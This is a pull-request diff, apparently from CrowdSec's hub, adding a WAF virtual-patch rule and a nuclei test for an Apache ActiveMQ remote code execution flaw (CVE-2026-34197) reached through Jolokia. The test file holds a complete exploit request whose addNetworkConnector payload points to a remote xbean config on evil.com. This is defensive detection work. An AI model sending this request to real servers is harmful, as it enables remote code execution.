Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 22 additions & 0 deletions .appsec-tests/vpatch-CVE-2026-34197/CVE-2026-34197.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
## autogenerated on 2026-07-01 13:08:11
id: CVE-2026-34197
info:
name: CVE-2026-34197
author: crowdsec
severity: info
description: CVE-2026-34197 testing
tags: appsec-testing
http:
- raw:
- |
POST /api/jolokia/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Origin: {{RootURL}}

[{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"removeNetworkConnector","arguments":["NC"]},{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost","operation":"addNetworkConnector","arguments":["static:(vm://test?brokerConfig=xbean:http://evil.com/poc.xml)"]}]
cookie-reuse: true
matchers:
- type: status
status:
- 403
5 changes: 5 additions & 0 deletions .appsec-tests/vpatch-CVE-2026-34197/config.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,5 @@
## autogenerated on 2026-07-01 13:08:11
appsec-rules:
- ./appsec-rules/crowdsecurity/base-config.yaml
- ./appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml
nuclei_template: CVE-2026-34197.yaml
38 changes: 38 additions & 0 deletions appsec-rules/crowdsecurity/vpatch-CVE-2026-34197.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,38 @@
## autogenerated on 2026-07-01 13:08:11
name: crowdsecurity/vpatch-CVE-2026-34197
description: 'Detects RCE in Apache ActiveMQ via Jolokia addNetworkConnector with xbean brokerConfig'
rules:
- and:
- zones:
- URI
transform:
- lowercase
match:
type: contains
value: /api/jolokia/
- zones:
- RAW_BODY
transform:
- lowercase
match:
type: contains
value: 'addnetworkconnector'
- zones:
- RAW_BODY
transform:
- lowercase
match:
type: contains
value: 'brokerconfig=xbean:http'

labels:
type: exploit
service: http
confidence: 3
spoofable: 0
behavior: 'http:exploit'
label: 'Apache ActiveMQ - RCE'
classification:
- cve.CVE-2026-34197
- attack.T1190
- cwe.CWE-94
1 change: 1 addition & 0 deletions collections/crowdsecurity/appsec-virtual-patching.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -72,6 +72,7 @@ appsec-rules:
- crowdsecurity/vpatch-CVE-2022-26134
- crowdsecurity/vpatch-CVE-2026-1557
- crowdsecurity/vpatch-CVE-2024-34102
- crowdsecurity/vpatch-CVE-2026-34197
- crowdsecurity/vpatch-CVE-2024-29973
- crowdsecurity/vpatch-CVE-2022-41082
- crowdsecurity/vpatch-CVE-2019-18935
Expand Down
Loading